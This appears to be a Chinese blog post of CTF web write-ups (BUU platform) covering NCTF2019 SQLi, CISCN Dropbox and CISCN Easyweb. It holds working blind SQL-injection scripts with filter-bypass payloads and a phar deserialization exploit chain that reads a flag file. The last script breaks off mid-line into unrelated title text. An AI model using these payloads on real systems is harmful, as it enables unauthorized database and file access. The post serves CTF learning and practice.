BUU刷题-web
Posted Rgylin
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU刷题-web相关的知识,希望对你有一定的参考价值。
[NCTF2019]SQLi
访问robots.txt
发现hint
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\\'|=| |in|<|>|-|\\.|\\(\\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
If $_POST['passwd'] === admin's password,
Then you will get the flag;
发现过滤了 太多东西 单引号都给过滤了 ,
不过这里可以用\\来闭合’看了看php版本[外链图片
可以用%00截断,那末思路就有了
先尝试一波正确回显
看到回显welcome,那末可以利用这个来判断 bool类型
regexp 字符串匹配支持正则
脚本为主要语句为
data = {
'username': '\\\\',
'passwd': "||/**/passwd/**/regexp/**/\\"^{}\\";{}".format((password+j),parse.unquote('%00'))
}
脚本为
import requests
import string
from urllib import parse
string= string.ascii_lowercase + string.digits + '_'
url= 'http://0c034adc-a4d9-4fe6-98f2-5ca68f2effe9.node4.buuoj.cn:81/index.php'
password=''
for i in range(50):
for j in string:
data = {
'username': '\\\\',
'passwd': "||/**/passwd/**/regexp/**/\\"^{}\\";{}".format((password+j),parse.unquote('%00'))
}
res= requests.post(url=url,data=data)
if('welcome' in res.text):
password+=j
print(password)
break
然后 提交密码 得到flag
看了看大佬wp 发现如果这里""被过滤的情况下可以用 16进制来绕过
[CISCN2019 华北赛区 Day1 Web1]Dropbox
首先随便注册一个号进去
上传一个文件后 发现有下载功能 ->任意文件下载
bp抓一下包
发现有戏
尝试一下 index.php显示文件不存在 那末路径换一下试试 最终…/…/index.php 文件存在
index.php
<?php
include "class.php";
$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>
class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db;
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">åˆ é™¤</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
delete.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
找到
public function close() {
return file_get_contents($this->filename);
}
可以控制 那末尝试构造调用此方法
$a= new User();
$a->db= new File();
$a->db->filename= '/flag.txt'
可是这样构造没有回显 ,那采取间接方法.
那么我们就让$this->db = new FileList(),让它去调用close,然后调用__call(),然后调用
__call()方法在调用 _destruct函数,打印结果
构造如下
<?php
class User {
public $db;
}
class FileList
{
private $files;
private $results;
private $funcs;
public function __construct()
{
$this->files = array(new File());
$this->results = array();
$this->funcs = array();
}
}
class File
{
public $filename = '/flag.txt';
}
$a= new User();
$a->db= new FileList();
$phar = new Phar("myphar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
[CISCN2019 总决赛 Day2 Web1]Easyweb
老套路 查看源代码 ,和访问robots.txt
源代码 发现类似注入点的地方
User-agent: *
Disallow: *.php.bak
看师傅的wp 是访问
image.php.bak
得到源码
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\\\0","%00","\\\\'","'"),"",$id);
$path=str_replace(array("\\\\0","%00","\\\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
那就尝试一下注入
输入\\0 时会被addslashes()函数转成 \\ \\0 进而将\\0过滤留下 \\从而可以转移’ 达到绕过目的
可以利用
# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)
得出回显的内容有JFIF
尝试爆出数据库
import requests
#username=123&password=Password
url ='http://d80bf902-c46b-46a9-82d1-c6da6e8bfb01.node4.buuoj.cn:81/image.php?id=\\\\0&path='
#JFIF
# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)
#
#
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
payload = f'or ascii(substr(database()/**/from/**/{i}buu刷题
BUU-WEB-[ZJCTF 2019]NiZhuanSiWei